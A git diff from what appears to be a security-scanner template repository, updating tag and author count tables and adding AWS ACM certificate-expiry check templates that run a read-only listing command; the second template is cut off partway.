+| coinlayer | 1 | | | | | | | | |
+| springsignage | 1 | | | | | | | | |
+| sporcle | 1 | | | | | | | | |
+| helm | 1 | | | | | | | | |
+| blogger | 1 | | | | | | | | |
+| helmet_store_showroom_project | 1 | | | | | | | | |
+| ewm | 1 | | | | | | | | |
+| mailhog | 1 | | | | | | | | |
+| ollama | 1 | | | | | | | | |
+| 1password | 1 | | | | | | | | |
+| cybrotech | 1 | | | | | | | | |
+| dashy | 1 | | | | | | | | |
+| drill | 1 | | | | | | | | |
+| namedprocess | 1 | | | | | | | | |
+| codecabin | 1 | | | | | | | | |
+| wavemaker | 1 | | | | | | | | |
+| smh | 1 | | | | | | | | |
+| readthedocs | 1 | | | | | | | | |
+| rake | 1 | | | | | | | | |
+| olx | 1 | | | | | | | | |
+| kipin | 1 | | | | | | | | |
+| teamwork | 1 | | | | | | | | |
+| coinmarketcap | 1 | | | | | | | | |
+| armemberplugin | 1 | | | | | | | | |
+| alltrails | 1 | | | | | | | | |
+| centreon | 1 | | | | | | | | |
+| default-jwt | 1 | | | | | | | | |
+| packetstrom | 1 | | | | | | | | |
+| oauth2 | 1 | | | | | | | | |
+| openwire | 1 | | | | | | | | |
+| pokemonshowdown | 1 | | | | | | | | |
+| cyberoamworks | 1 | | | | | | | | |
+| ap-pricing-tables-lite | 1 | | | | | | | | |
+| ncast | 1 | | | | | | | | |
+| cscart | 1 | | | | | | | | |
+| clink-office | 1 | | | | | | | | |
+| codebuild | 1 | | | | | | | | |
+| rpcbind | 1 | | | | | | | | |
+| paessler | 1 | | | | | | | | |
+| shopex | 1 | | | | | | | | |
+| license | 1 | | | | | | | | |
+| europeana | 1 | | | | | | | | |
+| whois | 1 | | | | | | | | |
+| personal-dictionary | 1 | | | | | | | | |
+| vampr | 1 | | | | | | | | |
+| kkFileview | 1 | | | | | | | | |
+| hanwang | 1 | | | | | | | | |
+| ogugg | 1 | | | | | | | | |
+| openv500 | 1 | | | | | | | | |
+| geocaching | 1 | | | | | | | | |
+| registrationmagic | 1 | | | | | | | | |
+| nirweb-support | 1 | | | | | | | | |
+| quttera | 1 | | | | | | | | |
+| webmodule-ee | 1 | | | | | | | | |
+| feifeicms | 1 | | | | | | | | |
+| smartgateway | 1 | | | | | | | | |
+| cf7skins | 1 | | | | | | | | |
+| webgrind | 1 | | | | | | | | |
+| front | 1 | | | | | | | | |
+| benjamin | 1 | | | | | | | | |
+| crystal | 1 | | | | | | | | |
+| myfitnesspal-community | 1 | | | | | | | | |
+| crontab | 1 | | | | | | | | |
+| workresources | 1 | | | | | | | | |
+| vagrant | 1 | | | | | | | | |
+| ocomon_project | 1 | | | | | | | | |
+| ansi_up_project | 1 | | | | | | | | |
+| flyte | 1 | | | | | | | | |
+| nextgen-gallery | 1 | | | | | | | | |
+| jobmonster | 1 | | | | | | | | |
+| talroo | 1 | | | | | | | | |
+| ligeo | 1 | | | | | | | | |
+| mypixs_project | 1 | | | | | | | | |
+| danieljamesscott | 1 | | | | | | | | |
+| stageshow_project | 1 | | | | | | | | |
+| zwave | 1 | | | | | | | | |
+| kyan | 1 | | | | | | | | |
+| sock | 1 | | | | | | | | |
+| joinmastodon | 1 | | | | | | | | |
+| icearp | 1 | | | | | | | | |
+| daybydaycrm | 1 | | | | | | | | |
+| nosql | 1 | | | | | | | | |
+| localize_my_post_project | 1 | | | | | | | | |
+| webclient | 1 | | | | | | | | |
+| mercusys | 1 | | | | | | | | |
+| wpaffiliatemanager | 1 | | | | | | | | |
+| gira | 1 | | | | | | | | |
+| symmetricom | 1 | | | | | | | | |
+| upward | 1 | | | | | | | | |
+| a360inc | 1 | | | | | | | | |
+| snapdrop | 1 | | | | | | | | |
+| armorgames | 1 | | | | | | | | |
+| plurk | 1 | | | | | | | | |
+| fleet | 1 | | | | | | | | |
+| xiuno | 1 | | | | | | | | |
+| alphaplug | 1 | | | | | | | | |
+| pretty-url | 1 | | | | | | | | |
+| dogtagpki | 1 | | | | | | | | |
+| alma | 1 | | | | | | | | |
+| scrapingdog | 1 | | | | | | | | |
+| jasperserver | 1 | | | | | | | | |
+| login-bypass | 1 | | | | | | | | |
+| wpquery | 1 | | | | | | | | |
+| cryptobox | 1 | | | | | | | | |
+| openautomationsoftware | 1 | | | | | | | | |
+| buddy | 1 | | | | | | | | |
+| meduza-stealer | 1 | | | | | | | | |
+| currencyfreaks | 1 | | | | | | | | |
+| kindsoft | 1 | | | | | | | | |
+| n8n | 1 | | | | | | | | |
+| qvidium | 1 | | | | | | | | |
+| pagerduty | 1 | | | | | | | | |
+| redbubble | 1 | | | | | | | | |
+| katz | 1 | | | | | | | | |
+| incsub | 1 | | | | | | | | |
+| global | 1 | | | | | | | | |
+| mediumish | 1 | | | | | | | | |
+| collect_and_deliver_interface_for_woocommerce_project | 1 | | | | | | | | |
+| librephotos | 1 | | | | | | | | |
+| carrdco | 1 | | | | | | | | |
+| directus | 1 | | | | | | | | |
+| cve2000 | 1 | | | | | | | | |
+| tcexam | 1 | | | | | | | | |
+| nessus | 1 | | | | | | | | |
+| hackerearth | 1 | | | | | | | | |
+| xenforo | 1 | | | | | | | | |
+| clubhouse | 1 | | | | | | | | |
+| authhttp | 1 | | | | | | | | |
+| websitepanel | 1 | | | | | | | | |
+| audiocode | 1 | | | | | | | | |
+| awk | 1 | | | | | | | | |
+| sisinformatik | 1 | | | | | | | | |
+| atutor | 1 | | | | | | | | |
+| chesscom | 1 | | | | | | | | |
+| gnuboard5 | 1 | | | | | | | | |
+| engage | 1 | | | | | | | | |
+| php-proxy | 1 | | | | | | | | |
+| bibliopac | 1 | | | | | | | | |
+| parsi-font_project | 1 | | | | | | | | |
+| eventum_project | 1 | | | | | | | | |
+| ffserver | 1 | | | | | | | | |
+| tunefind | 1 | | | | | | | | |
+| onelogin | 1 | | | | | | | | |
+| expressionalsocial-mastodon-instance | 1 | | | | | | | | |
+| thorsten_riess | 1 | | | | | | | | |
+| wp-cli | 1 | | | | | | | | |
+| blipfm | 1 | | | | | | | | |
+| dgtl | 1 | | | | | | | | |
+| presspage | 1 | | | | | | | | |
+| nagvis | 1 | | | | | | | | |
+| fabswingers | 1 | | | | | | | | |
+| flexnet | 1 | | | | | | | | |
+| timeclock | 1 | | | | | | | | |
+| teradek | 1 | | | | | | | | |
+| jupyterhub | 1 | | | | | | | | |
+| m-files | 1 | | | | | | | | |
+| championat | 1 | | | | | | | | |
+| collibra | 1 | | | | | | | | |
+| activeadmin | 1 | | | | | | | | |
+| nomad | 1 | | | | | | | | |
+| looneytunables | 1 | | | | | | | | |
+| social-warfare | 1 | | | | | | | | |
+| shadoweb | 1 | | | | | | | | |
+| satellian | 1 | | | | | | | | |
+| wpsmartcontracts | 1 | | | | | | | | |
+| ccleaner | 1 | | | | | | | | |
+| mastodon-mastodon | 1 | | | | | | | | |
+| wiren | 1 | | | | | | | | |
+| gigapan | 1 | | | | | | | | |
+| tianqing | 1 | | | | | | | | |
+| klogserver | 1 | | | | | | | | |
+| wpovernight | 1 | | | | | | | | |
+| homer | 1 | | | | | | | | |
+| novus | 1 | | | | | | | | |
+| ifunny | 1 | | | | | | | | |
+| vr-calendar-sync | 1 | | | | | | | | |
+| bower | 1 | | | | | | | | |
+| acsoft | 1 | | | | | | | | |
+| gist | 1 | | | | | | | | |
+| cutesoft | 1 | | | | | | | | |
+| multi_restaurant_table_reservation_system_project | 1 | | | | | | | | |
+| asp.net | 1 | | | | | | | | |
+| bws-updater | 1 | | | | | | | | |
+| node-red | 1 | | | | | | | | |
+| realor | 1 | | | | | | | | |
+| csa | 1 | | | | | | | | |
+| webtoprint | 1 | | | | | | | | |
+| sharingsphere | 1 | | | | | | | | |
+| aboutme | 1 | | | | | | | | |
+| exposed | 1 | | | | | | | | |
+| phpnow | 1 | | | | | | | | |
+| forumprawneorg | 1 | | | | | | | | |
+| secui | 1 | | | | | | | | |
+| incomcms_project | 1 | | | | | | | | |
+| broadcom | 1 | | | | | | | | |
+| v2924 | 1 | | | | | | | | |
+| viddler | 1 | | | | | | | | |
+| ras | 1 | | | | | | | | |
+| angularjs | 1 | | | | | | | | |
+| com_janews | 1 | | | | | | | | |
+| red-gate | 1 | | | | | | | | |
+| orchardproject | 1 | | | | | | | | |
+| my_calendar_project | 1 | | | | | | | | |
+| woo-bulk-price-update | 1 | | | | | | | | |
+| torify | 1 | | | | | | | | |
+| polls-widget | 1 | | | | | | | | |
+| containers | 1 | | | | | | | | |
+| musiciansocial-mastodon-instance | 1 | | | | | | | | |
+| sterling | 1 | | | | | | | | |
+| jalios | 1 | | | | | | | | |
+| tarantella | 1 | | | | | | | | |
+| disabledrocks-mastodon-instance | 1 | | | | | | | | |
+| user-management | 1 | | | | | | | | |
+| media-library-assistant | 1 | | | | | | | | |
+| register | 1 | | | | | | | | |
+| pinkbike | 1 | | | | | | | | |
+| skeb | 1 | | | | | | | | |
+| run-parts | 1 | | | | | | | | |
+| sabnzbd | 1 | | | | | | | | |
+| rakefile | 1 | | | | | | | | |
+| mixi | 1 | | | | | | | | |
+| mapproxy | 1 | | | | | | | | |
+| citybook | 1 | | | | | | | | |
+| interactsoftware | 1 | | | | | | | | |
+| smarterstats | 1 | | | | | | | | |
+| weglot | 1 | | | | | | | | |
+| nih | 1 | | | | | | | | |
+| garage_management_system_project | 1 | | | | | | | | |
+| prototype | 1 | | | | | | | | |
+| buddypress | 1 | | | | | | | | |
+| nexusdb | 1 | | | | | | | | |
+| opensns | 1 | | | | | | | | |
+| mdc_youtube_downloader_project | 1 | | | | | | | | |
+| mojoauth | 1 | | | | | | | | |
+| fark | 1 | | | | | | | | |
+| raspberry | 1 | | | | | | | | |
+| wpwax | 1 | | | | | | | | |
+| joget | 1 | | | | | | | | |
+| calendar | 1 | | | | | | | | |
+| jinfornet | 1 | | | | | | | | |
+| contact-form-entries | 1 | | | | | | | | |
+| xanga | 1 | | | | | | | | |
+| supportcandy | 1 | | | | | | | | |
+| mesos | 1 | | | | | | | | |
+| hrsale | 1 | | | | | | | | |
+| nette | 1 | | | | | | | | |
+| mojarra | 1 | | | | | | | | |
+| hubpages | 1 | | | | | | | | |
+| asciinema | 1 | | | | | | | | |
+| mystrom | 1 | | | | | | | | |
+| yelp | 1 | | | | | | | | |
+| simple-image-manipulator_project | 1 | | | | | | | | |
+| kindeditor | 1 | | | | | | | | |
+| admzip | 1 | | | | | | | | |
+| deimos | 1 | | | | | | | | |
+| stytch | 1 | | | | | | | | |
+| tripadvisor | 1 | | | | | | | | |
+| simple-file-list | 1 | | | | | | | | |
+| librespeed | 1 | | | | | | | | |
+| bagisto | 1 | | | | | | | | |
+| smartofficepayroll | 1 | | | | | | | | |
+| mastodon-countersocial | 1 | | | | | | | | |
+| nerdgraph | 1 | | | | | | | | |
+| sukebeinyaasi | 1 | | | | | | | | |
+| ismygirl | 1 | | | | | | | | |
+| skaut-bazar_project | 1 | | | | | | | | |
+| iframe | 1 | | | | | | | | |
+| powertek | 1 | | | | | | | | |
+| home-assistant | 1 | | | | | | | | |
+| cryptocurrencies | 1 | | | | | | | | |
+| zatrybipl | 1 | | | | | | | | |
+| modeldb | 1 | | | | | | | | |
+| emulator | 1 | | | | | | | | |
+| accent | 1 | | | | | | | | |
+| hongjing | 1 | | | | | | | | |
+| advancedcustomfields | 1 | | | | | | | | |
+| visual-tools | 1 | | | | | | | | |
+| csv | 1 | | | | | | | | |
+| zero-spam | 1 | | | | | | | | |
+| caldotcom | 1 | | | | | | | | |
+| gzforum | 1 | | | | | | | | |
+| sh | 1 | | | | | | | | |
+| mod-proxy | 1 | | | | | | | | |
+| couch | 1 | | | | | | | | |
+| xing | 1 | | | | | | | | |
+| servmask | 1 | | | | | | | | |
+| authorstream | 1 | | | | | | | | |
+| ftp-backdoor | 1 | | | | | | | | |
+| realtek | 1 | | | | | | | | |
+| bonitasoft | 1 | | | | | | | | |
+| kubeflow | 1 | | | | | | | | |
+| payroll | 1 | | | | | | | | |
+| julia | 1 | | | | | | | | |
+| visocrea | 1 | | | | | | | | |
+| looker | 1 | | | | | | | | |
+| tvt | 1 | | | | | | | | |
+| wp-ban | 1 | | | | | | | | |
+| auru | 1 | | | | | | | | |
+| xvideos-models | 1 | | | | | | | | |
+| roads | 1 | | | | | | | | |
+| supremainc | 1 | | | | | | | | |
+| homebridge | 1 | | | | | | | | |
+| phacility | 1 | | | | | | | | |
+| teradici | 1 | | | | | | | | |
+| rantli | 1 | | | | | | | | |
+| qualtrics | 1 | | | | | | | | |
+| kanev | 1 | | | | | | | | |
+| pahtool | 1 | | | | | | | | |
+| the-plus-addons-for-elementor | 1 | | | | | | | | |
+| go-ibax | 1 | | | | | | | | |
+| metacritic | 1 | | | | | | | | |
+| qmail | 1 | | | | | | | | |
+| grandnode | 1 | | | | | | | | |
+| thinkserver | 1 | | | | | | | | |
+| cleanweb | 1 | | | | | | | | |
+| liberty | 1 | | | | | | | | |
+| iparapheur | 1 | | | | | | | | |
+| motokiller | 1 | | | | | | | | |
+| erigon | 1 | | | | | | | | |
+| czepol | 1 | | | | | | | | |
+| cars-seller-auto-classifieds-script_project | 1 | | | | | | | | |
+| ecom | 1 | | | | | | | | |
+| webasyst | 1 | | | | | | | | |
+| maga-chat | 1 | | | | | | | | |
+| simply-schedule-appointments | 1 | | | | | | | | |
+| bws-testimonials | 1 | | | | | | | | |
+| microservice | 1 | | | | | | | | |
+| teamtreehouse | 1 | | | | | | | | |
+| giters | 1 | | | | | | | | |
+| iterable | 1 | | | | | | | | |
+| gloo | 1 | | | | | | | | |
+| browserweb | 1 | | | | | | | | |
+| church_admin_project | 1 | | | | | | | | |
+| livebos | 1 | | | | | | | | |
+| reqlogic | 1 | | | | | | | | |
+| everything | 1 | | | | | | | | |
+| nytimes | 1 | | | | | | | | |
+| visualshortcodes | 1 | | | | | | | | |
+| webctrl | 1 | | | | | | | | |
+| motioneye | 1 | | | | | | | | |
+| edgemax | 1 | | | | | | | | |
+| limit | 1 | | | | | | | | |
+| cube105 | 1 | | | | | | | | |
+| exchangerateapi | 1 | | | | | | | | |
+| houzz | 1 | | | | | | | | |
+| easy-student-results | 1 | | | | | | | | |
+| wsftp | 1 | | | | | | | | |
+| istat | 1 | | | | | | | | |
+| editor | 1 | | | | | | | | |
+| karma_project | 1 | | | | | | | | |
+| hydra | 1 | | | | | | | | |
+| prvpl | 1 | | | | | | | | |
+| nginxwebui | 1 | | | | | | | | |
+| shoowbiz | 1 | | | | | | | | |
+| skywalking | 1 | | | | | | | | |
+| daybyday | 1 | | | | | | | | |
+| dfgames | 1 | | | | | | | | |
+| smartblog | 1 | | | | | | | | |
+| etoilewebdesign | 1 | | | | | | | | |
+| crawler | 1 | | | | | | | | |
+| interact | 1 | | | | | | | | |
+| craft_cms | 1 | | | | | | | | |
+| alcatel | 1 | | | | | | | | |
+| swim_team_project | 1 | | | | | | | | |
+| ticketmaster | 1 | | | | | | | | |
+| epm | 1 | | | | | | | | |
+| alkacon | 1 | | | | | | | | |
+| aspnet | 1 | | | | | | | | |
+| omni | 1 | | | | | | | | |
+| taringa | 1 | | | | | | | | |
+| researchgate | 1 | | | | | | | | |
+| graphiql | 1 | | | | | | | | |
+| rhymix | 1 | | | | | | | | |
+| eyou | 1 | | | | | | | | |
+| quixplorer_project | 1 | | | | | | | | |
+| sila | 1 | | | | | | | | |
+| wl-500 | 1 | | | | | | | | |
+| mailmap | 1 | | | | | | | | |
+| eBridge | 1 | | | | | | | | |
+| baseapp | 1 | | | | | | | | |
+| skyscanner | 1 | | | | | | | | |
+| issuu | 1 | | | | | | | | |
+| i-plugins | 1 | | | | | | | | |
+| petfinder | 1 | | | | | | | | |
+| friendweb | 1 | | | | | | | | |
+| foogallery | 1 | | | | | | | | |
+| bigo-live | 1 | | | | | | | | |
+| ulanzi | 1 | | | | | | | | |
+| employee_records_system_project | 1 | | | | | | | | |
+| gab | 1 | | | | | | | | |
+| kotburger | 1 | | | | | | | | |
+| rubedo | 1 | | | | | | | | |
+| koha | 1 | | | | | | | | |
+| com-property | 1 | | | | | | | | |
+| twig | 1 | | | | | | | | |
+| jcms | 1 | | | | | | | | |
+| osint-p2p | 1 | | | | | | | | |
+| piratebay | 1 | | | | | | | | |
+| oas | 1 | | | | | | | | |
+| simple_task_managing_system_project | 1 | | | | | | | | |
+| postcrossing | 1 | | | | | | | | |
+| shardingsphere | 1 | | | | | | | | |
+| web-suite | 1 | | | | | | | | |
+| evernote | 1 | | | | | | | | |
+| mix | 1 | | | | | | | | |
+| fish | 1 | | | | | | | | |
+| foursquare | 1 | | | | | | | | |
+| jedox | 1 | | | | | | | | |
+| liftoffsoftware | 1 | | | | | | | | |
+| batflat | 1 | | | | | | | | |
+| catchplugins | 1 | | | | | | | | |
+| cron | 1 | | | | | | | | |
+| reflected | 1 | | | | | | | | |
+| chefio | 1 | | | | | | | | |
+| smashballoon | 1 | | | | | | | | |
+| alquistai | 1 | | | | | | | | |
+| easyvista | 1 | | | | | | | | |
+| tmdb | 1 | | | | | | | | |
+| pivotaltracker | 1 | | | | | | | | |
+| distcc | 1 | | | | | | | | |
+| bimi | 1 | | | | | | | | |
+| cowrie | 1 | | | | | | | | |
+| nutanix | 1 | | | | | | | | |
+| patriots-win | 1 | | | | | | | | |
+| wechat_brodcast_project | 1 | | | | | | | | |
+| codemiq | 1 | | | | | | | | |
+| ricoh | 1 | | | | | | | | |
+| ccm | 1 | | | | | | | | |
+| quiz | 1 | | | | | | | | |
+| wpsolr | 1 | | | | | | | | |
+| jorani_project | 1 | | | | | | | | |
+| yourls | 1 | | | | | | | | |
+| i-mscp | 1 | | | | | | | | |
+| syfadis | 1 | | | | | | | | |
+| cyberchef | 1 | | | | | | | | |
+| vibilagare | 1 | | | | | | | | |
+| ptr | 1 | | | | | | | | |
+| payeezy | 1 | | | | | | | | |
+| learning-management-system | 1 | | | | | | | | |
+| krweb | 1 | | | | | | | | |
+| aquasec | 1 | | | | | | | | |
+| cd-action | 1 | | | | | | | | |
+| thinvnc | 1 | | | | | | | | |
+| dragonfly_project | 1 | | | | | | | | |
+| blind-ssrf | 1 | | | | | | | | |
+| softlimit | 1 | | | | | | | | |
+| security | 1 | | | | | | | | |
+| updraftplus | 1 | | | | | | | | |
+| vertex | 1 | | | | | | | | |
+| malshare | 1 | | | | | | | | |
+| joomlashowroom | 1 | | | | | | | | |
+| vultr | 1 | | | | | | | | |
+| openethereum | 1 | | | | | | | | |
+| zoomsounds | 1 | | | | | | | | |
+| wp-video-gallery-free | 1 | | | | | | | | |
+| officeserver | 1 | | | | | | | | |
+| femtocell | 1 | | | | | | | | |
+| icloud | 1 | | | | | | | | |
+| emobile | 1 | | | | | | | | |
+| helpdesk_pro_project | 1 | | | | | | | | |
+| kanich | 1 | | | | | | | | |
+| documentor_project | 1 | | | | | | | | |
+| ssh-agent | 1 | | | | | | | | |
+| easyen | 1 | | | | | | | | |
+| xvideos-profiles | 1 | | | | | | | | |
+| macaddresslookup | 1 | | | | | | | | |
+| qibocms | 1 | | | | | | | | |
+| age-gate | 1 | | | | | | | | |
+| carbonmade | 1 | | | | | | | | |
+| o2oa | 1 | | | | | | | | |
+| viminfo | 1 | | | | | | | | |
+| phpgedview | 1 | | | | | | | | |
+| zbiornik | 1 | | | | | | | | |
+| ics | 1 | | | | | | | | |
+| nordpass | 1 | | | | | | | | |
+| nodered | 1 | | | | | | | | |
+| nsicg | 1 | | | | | | | | |
+| urlscan | 1 | | | | | | | | |
+| magnussolution | 1 | | | | | | | | |
+| wpb-show-core | 1 | | | | | | | | |
+| defender-security | 1 | | | | | | | | |
+| teamforge | 1 | | | | | | | | |
+| magnusbilling | 1 | | | | | | | | |
+| wordpress-country-selector | 1 | | | | | | | | |
+| jbzd | 1 | | | | | | | | |
+| producthunt | 1 | | | | | | | | |
+| webp_converter_for_media_project | 1 | | | | | | | | |
+| documentor-lite | 1 | | | | | | | | |
+| kivicare-clinic-management-system | 1 | | | | | | | | |
+| easyreport | 1 | | | | | | | | |
+| ciphertrust | 1 | | | | | | | | |
+| vnc | 1 | | | | | | | | |
+| systeminformation | 1 | | | | | | | | |
+| cudatel | 1 | | | | | | | | |
+| binom | 1 | | | | | | | | |
+| myblog | 1 | | | | | | | | |
+| bws-xss | 1 | | | | | | | | |
+| musicstore | 1 | | | | | | | | |
+| microfinance | 1 | | | | | | | | |
+| aflam | 1 | | | | | | | | |
+| openhab | 1 | | | | | | | | |
+| brighthr | 1 | | | | | | | | |
+| htmlcoderhelper | 1 | | | | | | | | |
+| winscp | 1 | | | | | | | | |
+| openmage | 1 | | | | | | | | |
+| bws-custom-search | 1 | | | | | | | | |
+| ligeo-archives | 1 | | | | | | | | |
+| helmet_store_showroom_site_project | 1 | | | | | | | | |
+| properties | 1 | | | | | | | | |
+| deployment | 1 | | | | | | | | |
+| cups | 1 | | | | | | | | |
+| yiboo | 1 | | | | | | | | |
+| biotime | 1 | | | | | | | | |
+| oahms | 1 | | | | | | | | |
+| phonepe-payment-solutions | 1 | | | | | | | | |
+| caldera | 1 | | | | | | | | |
+| goodjob | 1 | | | | | | | | |
+| pillowfort | 1 | | | | | | | | |
+| ait-csv | 1 | | | | | | | | |
+| super-socializer | 1 | | | | | | | | |
+| lms | 1 | | | | | | | | |
+| gogits | 1 | | | | | | | | |
+| minds | 1 | | | | | | | | |
+| ids | 1 | | | | | | | | |
+| xinuos | 1 | | | | | | | | |
+| bestbuy | 1 | | | | | | | | |
+| vk | 1 | | | | | | | | |
+| php_curl_class_project | 1 | | | | | | | | |
+| olt | 1 | | | | | | | | |
+| Microsoft | 1 | | | | | | | | |
+| helpdesk | 1 | | | | | | | | |
+| vmstio-mastodon-instance | 1 | | | | | | | | |
+| zkoss | 1 | | | | | | | | |
+| ultimate-weather_project | 1 | | | | | | | | |
+| node-srv_project | 1 | | | | | | | | |
+| b-elektro | 1 | | | | | | | | |
+| easycorp | 1 | | | | | | | | |
+| meilisearch | 1 | | | | | | | | |
+| viewlinc | 1 | | | | | | | | |
+| qwiz-online-quizzes-and-flashcards | 1 | | | | | | | | |
+| orcusrat | 1 | | | | | | | | |
+| interlib | 1 | | | | | | | | |
+| seeyon-oa | 1 | | | | | | | | |
+| taiwanese | 1 | | | | | | | | |
+| shopxo | 1 | | | | | | | | |
+| taskrabbit | 1 | | | | | | | | |
+| ldap-wp-login-integration-with-active-directory | 1 | | | | | | | | |
+| flowci | 1 | | | | | | | | |
+| phabricator | 1 | | | | | | | | |
+| pdf-generator-for-wp | 1 | | | | | | | | |
+| bookcrossing | 1 | | | | | | | | |
+| discusssocial-mastodon-instance | 1 | | | | | | | | |
+| pixelfedsocial | 1 | | | | | | | | |
+| goodoldweb | 1 | | | | | | | | |
+| codetipi | 1 | | | | | | | | |
+| embed_swagger_project | 1 | | | | | | | | |
+| nootheme | 1 | | | | | | | | |
+| orcus | 1 | | | | | | | | |
+| jgraph | 1 | | | | | | | | |
+| dockerhub | 1 | | | | | | | | |
+| couchsurfing | 1 | | | | | | | | |
+| nweb2fax | 1 | | | | | | | | |
+| codesnippets | 1 | | | | | | | | |
+| tjws | 1 | | | | | | | | |
+| eleanor | 1 | | | | | | | | |
+| wprssaggregator | 1 | | | | | | | | |
+| coderwall | 1 | | | | | | | | |
+| orbys | 1 | | | | | | | | |
+| microsoft-technet-community | 1 | | | | | | | | |
+| truth-social | 1 | | | | | | | | |
+| wishlistr | 1 | | | | | | | | |
+| sungrow | 1 | | | | | | | | |
+| hiawatha | 1 | | | | | | | | |
+| warriorforum | 1 | | | | | | | | |
+| eventtickets | 1 | | | | | | | | |
+| fusion | 1 | | | | | | | | |
+| moonpay | 1 | | | | | | | | |
+| message-me | 1 | | | | | | | | |
+| tellonym | 1 | | | | | | | | |
+| microcomputers | 1 | | | | | | | | |
+| sensu | 1 | | | | | | | | |
+| karma | 1 | | | | | | | | |
+| stackhawk | 1 | | | | | | | | |
+| linktap | 1 | | | | | | | | |
+| lorsh-mastodon-instance | 1 | | | | | | | | |
+| encompass | 1 | | | | | | | | |
+| dapp | 1 | | | | | | | | |
+| pluginops | 1 | | | | | | | | |
+| 'updraftplus' | 1 | | | | | | | | |
+| lotuscms | 1 | | | | | | | | |
+| somansa | 1 | | | | | | | | |
+| elasticpot | 1 | | | | | | | | |
+| isams | 1 | | | | | | | | |
+| greenbone | 1 | | | | | | | | |
+| parse | 1 | | | | | | | | |
+| pelco | 1 | | | | | | | | |
+| lua | 1 | | | | | | | | |
+| web-dorado | 1 | | | | | | | | |
+| mediation | 1 | | | | | | | | |
+| n-central | 1 | | | | | | | | |
+| enrollment_system_project | 1 | | | | | | | | |
+| clustering | 1 | | | | | | | | |
+| affiliates-manager | 1 | | | | | | | | |
+| planetestream | 1 | | | | | | | | |
+| gpc | 1 | | | | | | | | |
+| dynamic | 1 | | | | | | | | |
+| pivotal_software | 1 | | | | | | | | |
+| redux | 1 | | | | | | | | |
+| pauple | 1 | | | | | | | | |
+| vfs | 1 | | | | | | | | |
+| vistaweb | 1 | | | | | | | | |
+| markdown | 1 | | | | | | | | |
+| paysyspro | 1 | | | | | | | | |
+| h2c | 1 | | | | | | | | |
+| accessally | 1 | | | | | | | | |
+| senayan | 1 | | | | | | | | |
+| topacm | 1 | | | | | | | | |
+| bouqueteditor_project | 1 | | | | | | | | |
+| modx | 1 | | | | | | | | |
+| querysol | 1 | | | | | | | | |
+| ilch | 1 | | | | | | | | |
+| paramountplus | 1 | | | | | | | | |
+| roundcube | 1 | | | | | | | | |
+| behat | 1 | | | | | | | | |
+| vcloud | 1 | | | | | | | | |
+| pornhub-porn-stars | 1 | | | | | | | | |
+| helprace | 1 | | | | | | | | |
+| knowage | 1 | | | | | | | | |
diff --git a/TOP-10.md b/TOP-10.md
index fbf7c23be3..07d5a58d8b 100644
--- a/TOP-10.md
+++ b/TOP-10.md
@@ -1,12 +1,12 @@
-| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
-|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
-| cve | 2425 | dhiyaneshdk | 1251 | http | 7306 | info | 3621 | file | 337 |
-| panel | 1108 | daffainfo | 864 | file | 337 | high | 1635 | dns | 24 |
-| wordpress | 959 | dwisiswant0 | 803 | workflows | 191 | medium | 1473 | | |
-| xss | 895 | pikpikcu | 353 | network | 136 | critical | 981 | | |
-| exposure | 894 | pussycat0x | 345 | code | 80 | low | 258 | | |
-| wp-plugin | 834 | ritikchaddha | 320 | javascript | 55 | unknown | 36 | | |
-| osint | 803 | pdteam | 296 | ssl | 28 | | | | |
-| tech | 670 | ricardomaia | 232 | dast | 21 | | | | |
-| lfi | 647 | geeknik | 229 | dns | 21 | | | | |
-| edb | 598 | theamanrawat | 223 | headless | 11 | | | | |
+| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
+|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
+| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 |
+| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 |
+| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | |
+| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | |
+| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | |
+| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | |
+| osint | 804 | pdteam | 297 | javascript | 57 | | | | |
+| tech | 682 | princechaddha | 269 | ssl | 29 | | | | |
+| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | |
+| misconfig | 620 | geeknik | 231 | dast | 21 | | | | |
diff --git a/cloud/aws/acm/acm-cert-expired.yaml b/cloud/aws/acm/acm-cert-expired.yaml
new file mode 100644
index 0000000000..25a7ffafbc
--- /dev/null
+++ b/cloud/aws/acm/acm-cert-expired.yaml
@@ -0,0 +1,41 @@
+id: acm-cert-expired
+info:
+ name: Expired ACM Certificates
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure removal of expired SSL/TLS certificates in AWS Certificate Manager to comply with Amazon Security Best Practices.
+ impact: |
+ Expired certificates can lead to service interruptions and expose applications to man-in-the-middle attacks.
+ remediation: |
+ Regularly review ACM for expired certificates and delete them or replace with updated versions.
+ reference:
+ - https://docs.aws.amazon.com/acm/latest/userguide/acm-certificate.html
+ tags: cloud,devops,aws,amazon,acm,aws-cloud-config
+
+variables:
+ region: "us-east-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws acm list-certificates --region $region --certificate-statuses EXPIRED
+
+ matchers:
+ - type: word
+ words:
+ - 'CertificateArn'
+
+ extractors:
+ - type: json
+ name: certificatearn
+ json:
+ - '.CertificateSummaryList[] | .CertificateArn'
+
+ - type: dsl
+ dsl:
+ - 'region + " AWS region have expired SSL/TLS certificates"'
+# digest: 490a00463044022020875df0814bb41d33d015a50a6a2d23309be5b695bad8ba9840f77e139f719b02205052abd88786969a3d7dcc2594b881841f82308df082a71df3b221085d1e9ceb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/acm/acm-cert-renewal-30days.yaml b/cloud/aws/acm/acm-cert-renewal-30days.yaml
new file mode 100644
index 0000000000..3cae97828a
--- /dev/null
+++ b/cloud/aws/acm/acm-cert-renewal-30days.yaml
@@ -0,0 +1,57 @@
+id: acm-cert-renewal-30days
+info:
+ name: ACM Certificates Pre-expiration Renewal
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure AWS ACM SSL/TLS certificates are renewed at least 30 days before expiration to prevent service disruptions.
+ impact: |
+ Failure to renew certificates timely may lead to expired certificates causing service access issues or downtimes.
+ remediation: |
